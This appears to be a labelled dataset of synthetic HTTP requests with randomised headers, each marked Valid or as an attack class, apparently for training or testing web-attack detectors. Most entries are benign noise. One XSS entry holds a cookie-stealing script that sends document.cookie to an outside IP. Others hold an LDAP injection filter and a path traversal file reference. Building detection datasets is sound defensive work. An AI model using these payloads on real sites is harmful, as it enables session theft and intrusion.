Accept-Encoding: gzip, compress;q=0.8
Accept-Language: *
Cache-Control: max-age=08742
Client-ip: 60.163.101.113
Cookie: Osirt7tpR=ruwjaXxj;t0-wechobin=f;9haeIaer;a09co=w9wtranhaE
Cookie2: $Version="7"
Date: Tue, 23 Mar 10 18:16:14 UTC
ETag: W/"FFO.WqZBY@OGCvXC9"
Expect: 100-continue
From: lbain@rrsavE8.cz
If-Modified-Since: Thu, 01 Jul 04 10:24:41 GMT
If-Unmodified-Since: Sat, 30 Dec 06 10:42:20 UTC
If-Match: *
If-None-Match: "jHRbLbzgSPpTmtBGTSz5"
If-Range: Sun, 26 Aug 07 11:00:43 UTC
Max-Forwards: 2205
MIME-Version: 2.1
Pragma: no-cache
Proxy-Authorization: NTLM ZXNhdHQ1ZWxmczExdFJ0Y2hpdnFBMmNkUHJyWWdpVkVlc2FpdWV0bmVzbg==
Authorization: ts9eiw oezYrxoe=ecfeir
Range: 4974-38816,67976-
Referer: /arhgsd/dkciiae/csetsBab.css
TE: chunked,chunked;q=0.5
Trailer: Accept
User-Agent: Mozilla/4.5 (compatible; Konqueror/0.3; Win 9x; Kobht)
UA-CPU: x86
UA-Disp: 400,6938,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 953x845
Via: HTTP/9.7 www.arqydeso.jpeg:3
Transfer-Encoding: gzip
Upgrade: Elt/5.9, nst7P/5.9
Warning: 992 www.aveh.jpg "sdM0vnhTfrn" 
X-Forwarded-For: 100.230.251.99
X-Serial-Number: 0505318
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11352
Start - Id: 8659
class: Valid
GET /XARdNPA3ftpformnetcatmVeF/irirplsNfbagddYctgn/aama/qDM@KPY4qx/eCzteteigld7c/1eEaorunn/edrmsds8ss9enhNe/fZAom-8yU/dz5T_s6xP5.tiff?gasplnsyniwi=9976&pt=v%3D&wtlNT=1400053&tpBiaibc=4027843467&sesx5ioyemet=tJFfosxe-&3ic4cs=h%27&iei0e3rd=7817&ELX5=lhtmrtG0ih0atdbz&Nx=091 HTTP/1.1
Host: 66.240.148.210:93075
Connection: 0htgr
Accept: video/quicktime
Accept-Charset: windows-1255;q=0.6, windows-1258;q=0.1, utf-7, x-mac-arabic;q=0.5
Accept-Encoding: gzip, deflate;q=0.9, compress;q=0.1, gzip;q=0.2, compress;q=0.4
Accept-Language: *
Cache-Control: no-cache
Client-ip: 177.129.186.148
Cookie: Smt=pARFdln;IN0dE3YKtmpvbscriptin.=54;nbuoiiso= b;YaLaSisai=843489584
Cookie2: $Version="48"
Date: Tue, 14 Feb 06 23:43:40 GMT
ETag: "bqqF@POc4a5wCT5plef"
Expect: huicy=ryees
From: iqTi@9hcauaorqk.fr
If-Modified-Since: Thu, 19 Apr 07 22:10:49 GMT
If-Unmodified-Since: Fri, 23 Jul 04 03:28:21 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 01 Feb 09 03:05:45 GMT
Max-Forwards: 38
MIME-Version: 4.8
Pragma: no-cache
Proxy-Authorization: ns7siw llzif0=ebeiais
Authorization: NTLM aGFjN242MG9uZHRsbGltb3ZGeHV4ZW9zbjdpbjNjM3Bl
Range: -766,58-986789
Referer: http://www.aeSUe.biz/sefs/teaPe/nrih1ib/l0y3Tjy/yxtd.mdb
TE: gzip;q=0.6
Trailer: If-Match
User-Agent: Mozilla/8.8 (Windows; U; Windows NT 8.4; rr-ol; rv:6.1.0) Gecko/69718599
UA-CPU: 68000
UA-Disp: 051,717,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 8393x485
Via: 2.8 www.opf12T10.jpeg, web/0.1 110.74.228.217:99444
Transfer-Encoding: fse6; odieatp=ten9xnc2
Upgrade: tul6nr/8.0, k5roha/7.1, edhia/4.1, tben/5.7
Warning: 888 www.beiaIt.css "S3j3Xr4oawsaaadt" "Mon, 27 Aug 07 01:27:20 GMT"
X-Forwarded-For: 71.14.68.150
X-Serial-Number: 396730650206
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8659
Start - Id: 20754
class: Valid
GET /tud2iHohsksmh2r/mtcoa2eJsrrwhd/a94DQJFdJuOGauAlH2U/xOiD7lIfoter5wO8tdho/4edpsLmhCtnwat/8NV/ld/eQHbi5C8/trAgesnr.png?iD2tnia=026328&frh=%25t&2J5@HuHBX=335636&dtw=98376&ugmtdmfuts=ta&az1astf4kcwpad=2494808850&an6nds=65014697&stiSsedeoo=33740&AtN0Uwindow.open=ocetPt-mZ9cM&eelccwLya=a%3D7vbscriptsock_stream&haseaadansenl=L+nullhttpDsq2rh&04lihetl=disnrT%7Ekaah&eaaToepssNo0=%5Cliaatie%3C HTTP/1.1
Host: www.ua8gft.st
Connection: doibl4wE
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: *;q=0.5
Accept-Language: aTs-eit, tNub5ojn-doawdnps, mJor-48tse3;q=0.7, Ieljf5-umDmT;q=0.1, gGnzb-se4n;q=0.0
Cache-Control: no-store
Client-ip: 160.200.75.96
Cookie: -selectwRYOacceptB=2tsimaeattuoenaaCr;hosthl=5stdinwlosee;ucmdHIWYeV=4;t8zbottuit6tk=4043
Cookie2: $Version="82"
Date: Sat, 17 Nov 07 14:24:35 CET
ETag: W/"32r7hQgjXnRa3zv"
Expect: sbcoa
From: txeT@aevntoegn.com
If-Modified-Since: Fri, 18 Jul 08 08:37:37 UTC
If-Unmodified-Since: Sat, 14 Apr 07 11:32:55 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 5
MIME-Version: 6.1
Pragma: srehutym=6
Proxy-Authorization: opwp oxtsr=sist
Authorization: Basic cmFlaDpkb0Vhbm1uUw==
Range: 802086-,4327-
Referer: /krdaf7o/nnoi.wmn
TE: deflate,trailers
Trailer: Expect
User-Agent: tIns/3.7.1.6
UA-CPU: StrongARM
UA-Disp: 2316,870,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 2236x546
Via: HTTP/3.6 www.l2enu.js, FTP/7.5 222.82.165.165:5561
Transfer-Encoding: identity
Upgrade: on4No/1.1, ethsR/6.5, yReop/0.2, in9/6.6, japnn/5.3
Warning: 220 www.htxyn.js:56846 "tipspynata3kBht" "Tue, 15 Sep 09 04:06:34 CET"
X-Forwarded-For: 148.116.239.129
X-Serial-Number: 716222532954
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 20754
Start - Id: 9168
class: Valid
GET /li81aqKs/swoelhhfyofUt/oHPEFlw6xiiFhwx/oaA/a6KPjWNi4RJm/cDt/dR/tt/e40bVcMopQ@IqSl2BYg/hCG0JrJj/eRkr.dll?btl=EOQiRmianeF&eEn1tegFngoA=7&orehm0nretada=pibaieil&cycdaNt=Opif%3F%5D+N1&KnK7Yu8=9insGhotttusuet6vt&1Mxp_NZOnullyjiRt=9653139&deuEtexihyp=cotwvinuscflxheyk&lozaSo=5&ubprnne6geatwdl=exec6+bo&tuaoP=9&althmsn0neer4l=p%7Etslehee+eaoh&qF5mWXUqetc2xterm=n3dmn4lto&oylftsUnthDx=581687&ui0YEhhRse=5870071087 HTTP/1.1
Host: 124.249.80.38
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: windows-1258, koi8
Accept-Encoding: deflate, deflate;q=0.0
Accept-Language: elxod8l5-apO4sM;q=0.1, ltwe5cs-Z;q=0.2, nw62-l;q=0.0, Euieoyr-utrnj
Cache-Control: only-if-cached
Client-ip: 91.110.73.33
Cookie: _VUyZQopenXv@f=sr2ptrizie9a;nr8SUX8_img=76579;nlyfapayeejY=493;ao9onasduap= $bqh
Cookie2: $Version="1"
Date: Sat, 20 Jan 07 12:25:13 UTC
ETag: W/"-fmhV-@Ije5xJ9oFP"
Expect: 100-continue
From: fwtTde@tnn0ld58.biz
If-Modified-Since: Sun, 31 Aug 08 20:14:29 CET
If-Unmodified-Since: Mon, 07 Aug 06 16:46:00 CET
If-Match: "op_SLdSNz7XIiGI"
If-None-Match: "Q-@3JcdonPVlQHL"
If-Range: "ZWgLvi5O.kC03pIUTifo"
Max-Forwards: 60
MIME-Version: 0.0
Pragma: no-cache
Proxy-Authorization: Basic ZGlvczp4b2xlZXg=
Authorization: ccien ezres=wwlen
Range: -7586
Referer: /tcIMaS/tien.msf
TE: trailers
Trailer: Referer
User-Agent: Mozilla/2.1 (Windows; U; WinNT 7.5; em-ib; rv:0.7.3) Gecko/40968484
UA-CPU: MIPS
UA-Disp: 226,033,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 001x9335
Via: 9.0 97.174.222.66, 9.3 200.45.110.139:96, 0.5 24.229.194.210
Transfer-Encoding: gzip
Upgrade: mapEt/8.1, RNae/5.1
Warning: 905 www.dgfeerSr.html:96082 "t0ewrycrethaeHou7" "Thu, 31 Mar 05 07:13:11 GMT"
X-Forwarded-For: 98.82.13.56
X-Serial-Number: 3795859892
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9168
Start - Id: 2913
class: Valid
GET /o@/JykUjpositionVBLP8W0IY/e6e1r3p2/window.openRlink/2sl7wndae/hqr9ML/nb24wMm3SUZyC_EevY/aZ/Fxp_8AQyJ%uyx/oKF@SlKVZTJ/zfrom/ontLhq4Onhlntatcu.asmx?toDoohs9wyach1s=yoRsgrpqhvar&Oasezh=eOEEJp2-T3uJ&7GOgIinsertk7rBkb=whot8sghscriptisse%2Bciih&omhifeeare=153083&haR1or=0&@bBqKpassthru3rt=1762674&plbtuTir=6&Aen34oevlt5tu=6urTwQ4yUCX&xu=1265&qpVVAXaccepthp=nadecetxcd&mkaoso=9eoco&tWfFl8nTinputjv=ep1nb.wkG-&ptbe0aasoohts=Dasiomte&kos=a9dtznl%3DzKbt%3De&AoNusoRo=%28vmcewe+m HTTP/1.0
Host: www.oc3oinwpe.gov
Connection: close
Accept: */*
Accept-Charset: euc-kr;q=0.3, x-mac-turkish, euc-kr, x-mac-icelandic;q=0.7
Accept-Encoding: *;q=0.5
Accept-Language: hnShTDO-Esttsce;q=0.0, im9-wmao;q=0.2, l-pc;q=0.8, du-nnN;q=0.1
Cache-Control: max-age=0062
Client-ip: 97.193.5.193
Cookie: clrgp=nheed;8uW.kKin1OTb=1593716;as=16401204;Fo@insert=erm>a0ey;nbGSD=9
Cookie2: $Version="7"
Date: Fri, 14 Sep 07 11:14:08 GMT
ETag: W/"p2oj1VHuCSp68DNvr"
Expect: ySha9
From: oraTcnio@2roehlm.com
If-Modified-Since: Fri, 05 Mar 04 04:28:14 UTC
If-Unmodified-Since: Sun, 17 Aug 08 20:08:33 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 28 Nov 04 22:38:52 CET
Max-Forwards: 22
MIME-Version: 9.1
Pragma: m6h=oa
Proxy-Authorization: nioget islss0=Oeote
Authorization: onssla emniidlr=tueeyth
Range: 8-0812,200838-406
Referer: http://www.tfoetH.de/eviufzf.txt
TE: gzip;q=0.6
Trailer: Transfer-Encoding
User-Agent: dUtaeprdt/3.5
UA-CPU: Sparc
UA-Disp: 7777,5626,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 640x6169
Via: FTP/5.6 91.196.112.101
Transfer-Encoding: deflate
Upgrade: DalUes/1.8, eai/7.4, 4nntra/8.0, otAS/6.6, rbt4ra/0.8
Warning: 530 www.zisn.js "a3sxuae" "Sun, 09 Jul 06 13:08:32 GMT"
X-Forwarded-For: 88.122.68.80
X-Serial-Number: 440914790634409640
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2913
Start - Id: 44646
class: PathTransversal
GET /g0P7.r0kfBdUtb/oifirnyzeI8e57no/r08G7AAS7/e4SarPYw.2vXcauE@Exe/6mqsk0xain/3-ckma6DppCx7/D7Tcat@Zk@Cbsg/aTB47Zm36GGNgQiwt/hut0/rlEndgh.dll?tnmh4rbhd=Ft%3Co7h%5Bs&tssrn=3&dRChttps=nmI&execauCWSz9mE=405 HTTP/1.1
Host: 98.48.163.73
Connection: keep-alive
Accept: video/mpeg, application/rtf;q=0.7, audio/x-wav
Accept-Charset: iso-8859-4;q=0.1, x-mac-ce
Accept-Encoding: gzip, gzip;q=0.5, gzip;q=0.8, compress;q=0.1
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 134.190.203.154
Cookie2: $Version="00"
Date: Sat, 03 Oct 09 13:49:38 GMT
ETag: W/"_VFS2wW67gDZE-6or_"
Expect: 100-continue
If-Modified-Since: Tue, 17 Nov 09 03:28:07 GMT
If-Unmodified-Since: Sat, 05 Nov 05 04:26:48 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 58
MIME-Version: 8.6
Pragma: no-cache
Proxy-Authorization: cneski uhtR=teim
Authorization: Basic N3dEaDh0OmE1c2RoN3M=
Range: 04-,-52547
Referer: /iePluxe/Tfte5/mrsesnGh.mp3
TE: trailers,trailers
Trailer: Cache-Control
User-Agent: doc(    file:///c:/Is/twrvfboe.xml )
UA-CPU: 68000
UA-Disp: 099,001,16
Via: rao6/3.2 www.fdnh.js
Transfer-Encoding: cacN; qehu2=cwrne

null

End - Id: 44646
Start - Id: 46755
class: XSS
GET /gXselectUlsTVD/pYeA8bayCi/R8izL_O5Jo/gtpa7kR98KEV/hhohodxm8/n1_UiIRwvy0.php4?ttfvpU1sorf=wXLN&fptwVafp2saypu=PubehlhhTrip1R&ugnstofadr=0555&hsdm6ixt=tjV.hMFbhcL&csTes=%3Cebin%28rreplaceroe8wI%27&n9bahf=ttjia&sbralhahann1la=p1Eze%40u&ernoieqs0ceoo=5&el4souao=mudcfS%5Dehdzform&rli=94824&deiIcbndg=9di4qbVGRK1G&etbtehl=TCdos&iotFncto0wSm=862037909 HTTP/1.1
Host: 22.176.246.125
Connection: close
Accept: text/*;q=0.0
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: lotoon-0e8Wio, ywwyzae-lduihq, 3e-ite5oa4, u-O3R, DefonDb-cwest;q=0.3
Cache-Control: no-transform
Cookie: qlwo=<!-- -- --><script >[window.open('http://119.25.165.116/neol.mdb'+document.cookie);]</script><!-- -- -->;af=48
Cookie2: $Version="0"
Date: Wed, 05 Dec 07 11:25:41 GMT
If-Modified-Since: Sun, 10 Aug 08 04:48:20 CET
If-Match: *
If-None-Match: "GaO3vPbUsnWo90u_."
If-Range: *
Max-Forwards: 7
Pragma: yona7=oaene
Authorization: Nxues ifaoemoa=ekIti
Range: -8298
Referer: /clodhl.tar.gz
TE: trailers,trailers
Trailer: If-None-Match
User-Agent: Mozilla/9.8 (compatible; Konqueror/2.3; Open BSD i586; reeyants)
UA-Color: color32
Via: 4.0 www.ehopoe.shtml, 0.3 94.208.40.51, 6.8 www.rmianbj.gif
Transfer-Encoding: deflate
Upgrade: LeDtos/4.3
Warning: 945 88.229.111.122 "bweeokslau" "Thu, 12 Jul 07 08:20:54 GMT"
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46755
Start - Id: 34412
class: Valid
PUT /wH@abhK1f3izw4O-iRsA/r8lBtr/IByZj2l/dF/typ-9rD/jBkJ9OXD-i.js? HTTP/1.1
Content-Length: 47
Content-Language: zNlsmpao,tExci
Content-Encoding: deflate
Content-Location: http://emhegu.gov/tnrnbk4/glcwta/Yblwhsem.cgi
Content-MD5: cGkybWw3ZXJlb0ZpWEh0bw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 27 Jun 06 19:58:29 UTC
Last-Modified: Tue, 10 Aug 04 05:19:58 GMT
Host: 202.166.248.12
Connection: xtittsre
Accept: audio/*
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: vwrl-ioiSbao;q=0.8, svy-t, hdrberoe-c, c-nc;q=0.8, iflade-yo;q=0.8
Cache-Control: no-transform
Client-ip: 98.127.115.183
Cookie: s7jnm=vj;xx1wW98Z=86
Cookie2: $Version="732"
Date: Tue, 28 Oct 08 09:03:36 CET
ETag: "IAj1x6IVEU3h-wdL_"
Expect: 6sjqd
From: sguefot@nd3dact2t0.ch
If-Modified-Since: Thu, 23 Oct 08 18:23:33 GMT
If-Unmodified-Since: Wed, 19 Oct 05 18:58:53 GMT
If-Match: "z6xh1qy3EkBf41S"
If-None-Match: *
If-Range: "i4Xo9I8RKaHHIPPhXG-"
Max-Forwards: 11
MIME-Version: 8.4
Pragma: iln=hclErdeA
Proxy-Authorization: Digest response="91Ed0CCc3Fc4F1F67Ad2f1f551CE9C3F"
Authorization: NTLM b3N5ZHR0ZWFpcHVkZzhuMGVpNnJmc21lbm43aG1sZWEyaDRoZnhaYWx0ZG41Nmxo
Range: -7418,428-0
Referer: http://exNt.uk/TndqcdAa/rsha.mpg
TE: chunked;q=0.2,gzip;q=0.7,chunked;q=0.8
Trailer: Expect
User-Agent: sArvemuo (i3U2ZtKfL)
UA-CPU: StrongARM
UA-Disp: 501,097,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 995x932
Via: 2.0 82.52.125.136:58, FTP/9.7 137.88.196.71, HTTP/2.9 www.6talvv.tiff
Transfer-Encoding: iwou; peqidpe=tefdi
Upgrade: ovAeer/6.4, irvwrQ/0.5, snd8l/4.6, ann/7.0
Warning: 076 www.tlWems.gif "aretamgt" 
X-Forwarded-For: 229.28.6.246
X-Serial-Number: 757195362418
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

sandatlvde2=rwu&ao=918486&az9zed8saepte=nwotonm

End - Id: 34412
Start - Id: 25911
class: Valid
GET /mrT7a.msf?otupaaiIIbe=Nheai5&Ch9w0imga1O8=eane6link9sIalsbetweenuei-&y.WusqmU1rmaT=tipositionaO0pinsert64irlc%25&o6esh7luer=qioscoipo7&ini8vutFa=rrtllor&xtermlGp=ehSl0lhsxirTrn&nmene=eOw2qn&NniainEt=nQss00&hspsduRg=f2uDemnokaMw0&taohe=116 HTTP/1.1
Host: www.ikrmdf4a.it
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: iso-8859-8;q=0.7, utf-7;q=0.0, iso-2022-jp
Accept-Encoding: deflate
Accept-Language: *
Cache-Control: uast=lidfbs
Client-ip: 107.100.56.91
Cookie: 4fhIge=RHpnllc;4KUvG-RLm=oyec3ntu;cJ=72;uvhe1istmrr=dgaeY5oeoeoD
Cookie2: $Version="78"
Date: Sat, 09 Jul 05 16:27:40 UTC
ETag: W/"q3Fpekrqkx1lVku"
Expect: saorva
From: gosesow@ihn6lcen.de
If-Modified-Since: Fri, 30 Oct 09 20:21:59 CET
If-Unmodified-Since: Wed, 26 Mar 08 09:34:21 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 10 Aug 07 06:14:27 UTC
Max-Forwards: 285
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: Digest opaque="fwhyni8g"
Authorization: NTLM c05jTmlUaGlyZXkxZUlybHN5MWFvNFdFd2VuaDJvQWd4Z3B1OGhza202c3U=
Range: -1130,110984-785,-31
Referer: http://ejcewtl.fr/lbtCp/9waOn4di/ao4s/stipQnp.jsp
TE: trailers,trailers
Trailer: Host
User-Agent: dareFhn (oQJILTO; 9RZTej; trCUxXCv@i; cw-N_1v)
UA-CPU: x86
UA-Disp: 859,629,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 069x973
Via: 3.7 251.20.215.67, 7.7 www.ctnx5s.htm, HTTP/1.8 152.164.231.172
Transfer-Encoding: dtShn
Upgrade: nu22E/7.6, eitpH/9.4
Warning: 862 254.139.199.159 "hnptOgFo1IjtwesaTav" 
X-Forwarded-For: 11.41.211.10
X-Serial-Number: 1807971586692
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25911
Start - Id: 7009
class: Valid
PUT /A0frjecrsjYhstu/SdwwuhhaeRoi4Adk/TEkq9ZL/Lmtsc3pf1nhw/yevxEte/Lgonxaluairoam4o/unelnii2sttLsg/-mMCU1l/443lXl24MJ-Qii5/tn9Uhn9cU/lwitlce5lodapnx/bodyfromBQ0passthruG7T-kUjz.swf? HTTP/1.0
Content-Length: 230
Content-Language: axd3l,pin,mnmos
Content-Encoding: identity
Content-Location: http://www.iw9g.net/seyuezo/tadaE.rar
Content-MD5: czg4aWx0YkVvc3Q4bnl0YQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 03 Feb 06 14:32:40 UTC
Last-Modified: Thu, 29 Jul 04 11:38:20 UTC
Host: www.hohra7.cz
Connection: ulifgi2
Accept: application/*;q=0.3
Accept-Charset: utf-7, x-mac-arabic
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: max-age=22251
Client-ip: 226.93.8.242
Cookie: sqa=956;48from-G= nhs;no=nna;udusr@e9xlAr8=msf+
Cookie2: $Version="6"
Date: Mon, 22 Feb 10 03:06:08 UTC
ETag: "7CfSOWX-WuxMsP_N"
Expect: 100-continue
From: eHtrAtry@rnairt.fr
If-Modified-Since: Fri, 29 Aug 08 14:54:56 CET
If-Unmodified-Since: Fri, 03 Mar 06 07:32:42 UTC
If-Match: *
If-None-Match: "YVe58JFdhuU-XAB"
If-Range: *
Max-Forwards: 9
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: NTLM dWJubHNhV2V3dGluZWRyYmFYenFxZWdZZWNpZDMxYUZyb2Rqbg==
Authorization: Basic bjFpbjpkMTV0ZVRN
Range: 594453-,90-83016,710615-38453
Referer: /teersi/tw2lanco/nudole/ma6sgakr.mpeg
TE: chunked,trailers,trailers
Trailer: Cache-Control
User-Agent: sae4CSH
UA-CPU: 68000
UA-Disp: 5230,785,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 443x583
Via: 1.9 www.aAeti4.htm, 6.1 77.194.93.124, HTTP/4.0 245.240.138.153
Transfer-Encoding: deflate
Upgrade: duhc1d/2.7, efNnL/5.9, iitden/5.4
Warning: 589 www.nhhyogma.shtml "fHhMnnwmhsiuhee63ct" "Tue, 29 May 07 19:39:21 UTC"
X-Forwarded-For: 67.65.254.52
X-Serial-Number: 95729667
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ld4eshaoaaH=es &ntehpe=291&3a=185431489&bXlibTt1B=868&rgxErzvpoy4in=y8_&bn=8nl&5pnsetbn=9566427&ctengeeA3sfn=003770&4suHpduseMH=920109&bo=rhso&g7plwi=7775895&5recaaj=e0P&3e=sv.mG2JXh4l&Aw43ade0oi=5336362&21TVBrp3wlocation=linclude

End - Id: 7009
Start - Id: 36972
class: LdapInjection
GET /mapR4J2AOFYBFthBXnYC/hwwo2yCVRLTP1GDuC/nqedKHQsgIUPyeh/eTJM4UhjdXDnBiwO2jk.aspx?tnahOp4xvltRtu=t%3Acachilda&nvwKiqi1Adh9Kmi=74rqapazoCj&oLs.servicesnF4AandnL=l33MN4H6vR6&Afha=eidocumentC&ObodyrYotSydocumentg=1WO59Aquc8&xnrm9aTd1ut2=hrI%25tu8Ydocumente%25siI%3Crcv+b&ailheo=dIdis%3Bdpoi%2F&psnq7eie=1&oh2ezodt=ek6EEg2Qfs&cnmoenazdp=%3Fn%25u0&ojioy=%25d&dih=8926%29%28%26%28objectClass%3DrRu%29%28%7C%28sn+++%3D+j8e%29%28cn%3D0d++J*%29%29 HTTP/1.0
Host: www.ieor2Pcc.fr:80
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: iso-2022-kr;q=0.3, cp-950;q=0.1
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: max-stale=013
Client-ip: 227.89.168.60
Cookie: mhSc=>+X2;atsyir=939675
Cookie2: $Version="599"
Date: Sat, 10 Jul 04 17:06:36 GMT
ETag: W/"kRj_Ud1No8MgV-PGN5a"
Expect: ss5nnhar=Ibtoee;tsmh
From: fipt@jjMrleib1.biz
If-Modified-Since: Sat, 27 May 06 05:43:22 UTC
If-Unmodified-Since: Mon, 15 May 06 10:42:22 GMT
If-Match: *
If-None-Match: "b81RCllo4JeISay"
If-Range: Tue, 27 Apr 04 15:44:31 CET
Max-Forwards: 8687
MIME-Version: 8.6
Pragma: lno13wco='ceet'
Proxy-Authorization: Basic aGlsTmUwOmxzdG9zZmU=
Authorization: NTLM ZXBuYXRUNW9zamhlbk50cGN5ZWdSOGtOYW9laGR3VWV1Z2FPcTBi
Range: 84-,-422477,1197-5319
Referer: /6vsese/nnanciar/gdmthy/tneae/dogrImOk.mdb
TE: deflate;q=0.0
Trailer: Max-Forwards
User-Agent: Mozilla/4.7 (Machintosh; U; PPC 2.0; rh-tv; rv:4.7.6) Gecko/08714299
UA-CPU: StrongARM
UA-Disp: 553,0581,32
UA-Pixels: 654x7541
Via: FTP/0.7 193.235.139.46
Transfer-Encoding: compress
Upgrade: eslm/4.5, njAt/8.0
Warning: 330 236.251.100.102 "4xln" "Thu, 31 Mar 05 03:35:22 UTC"
X-Serial-Number: 4593021783716355
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36972
Start - Id: 10301
class: Valid
GET /ewZw6hkjH6@9RVuFnSb/1.Cprocessing-instructionXlogmR./Ztw.dll?ZEVBWKZ=pTrsxaaYlclde&nna517sENeed47a=ro7ransAskwaiaa&4j3Fh=rNrt80n&KV_O4@v3n=re7tttnntsI&aietcd=otdss HTTP/1.0
Host: 3.84.185.83:80
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: cp-936;q=0.4, iso-8859-5;q=0.3, windows-874
Accept-Encoding: *
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 42.80.49.249
Cookie: bhsij=413
Cookie2: $Version="34"
Date: Wed, 16 Jul 08 13:54:51 CET
ETag: W/"fi7qZFX-_73wO95bbRb"
Expect: 100-continue
From: nS3ts1a@t3dEl.it
If-Modified-Since: Mon, 16 Jul 07 15:51:15 CET
If-Unmodified-Since: Tue, 06 Apr 04 18:33:33 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 11 Nov 05 19:15:26 UTC
Max-Forwards: 7915
MIME-Version: 4.3
Pragma: 3i='ET'
Proxy-Authorization: gx9nas 4au7d=n9Ge
Authorization: Basic U21ocGluaXM6ZVdyczlvdA==
Range: 12-5596
Referer: /m4tsmwrl/hScb/yagle/a6jA.shtml
TE: trailers,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/3.6 (X11; U; Linux i586 5.8; oM-3o; rv:8.9.2) Gecko/38981043
UA-CPU: 68000
UA-Disp: 2081,300,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 032x7737
Via: srx/9.6 www.ineoe.gif, 1.0 www.qten2sa.png
Transfer-Encoding: deflate
Upgrade: sawiI/5.5, tetn/9.6, nngke/0.8, gdi/4.8
Warning: 089 77.21.70.73 "oeaacxztie0eaee7elv" "Wed, 05 Oct 05 21:11:47 UTC"
X-Forwarded-For: 134.209.24.233
X-Serial-Number: 86455212
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 10301
Start - Id: 16506
class: Valid
GET /afxV5Bl/ceDejdoE5/iade/CaVx1n6HWb_JDu/QVnetcatz/eHT/rt6nsmSpa0myuneri/ylY.png?pzxns=ohOednsopftgrMi&e9zaymactlu83hs=46888141&h7taieoara5se=cr7+iopts13it%24hit&_uehDKp=oa%5DmZc+g%25nn-i&vhapev1y=eW4BZxCOjfd&G@ZmdeletedaMCblocation=hrM0&dmEtoLm6gx3rpCa=nnejia&aiauuTV=mtCmetalTnhfxankh&t9fee=hsoefuraeybo8O&os5G5silythll=o+oc6%2Bk2p&tmosNar8uu=en6ddciOkae+qe HTTP/1.1
Host: www.5orusq.org
Connection: oe3d1fh3
Accept: */*;q=0.7
Accept-Charset: iso-8859-8-i;q=0.5, windows-874, windows-1253, big5
Accept-Encoding: compress, identity, deflate, identity;q=0.7
Accept-Language: *
Cache-Control: max-age=82
Client-ip: 112.195.115.4
Cookie: aiPctandd0oesc=65979886;dvCtesdtig57tRn=ocW
Cookie2: $Version="74"
Date: Fri, 07 Apr 06 06:44:32 CET
ETag: W/"GlObjQf1Zi-bSKW5MG"
Expect: 100-continue
From: a3hb@rjzaoeAala.com
If-Modified-Since: Sat, 03 Nov 07 15:10:00 GMT
If-Unmodified-Since: Tue, 19 Dec 06 21:34:11 GMT
If-Match: "YkM9UqcVgVmyyQa2WWu"
If-None-Match: "kmpWioTbEm18crm"
If-Range: Sat, 03 Apr 04 10:04:55 GMT
Max-Forwards: 860
MIME-Version: 0.2
Pragma: gU0ejamE='p'
Proxy-Authorization: NTLM cmxwZ2E1eGdUTmdzNmVydGdib2VyczVyc3RhdG9pc2k=
Authorization: NTLM cnR1bWQ5RW9oYW5lZWtwY25vdmVzbmllemhvc3duZXRQcnRuYWVpdG9l
Range: 90-3929,2123-,048886-
Referer: http://emty.org/6f9h/ejsrs/euie/EttVe.nsf
TE: gzip
Trailer: Via
User-Agent: 0h45aaetiwhe
UA-CPU: StrongARM
UA-Disp: 456,224,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 950x803
Via: 0Eg/4.0 www.waut.gif, 0.9 www.qAseo.tiff, HTTP/3.1 24.226.8.174
Transfer-Encoding: identity
Upgrade: doc/7.0, ari/9.3, s1yrm/6.9
Warning: 399 165.168.5.56 "Yeip137iXelsbw" 
X-Forwarded-For: 59.247.137.64
X-Serial-Number: 924261
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16506
Start - Id: 37104
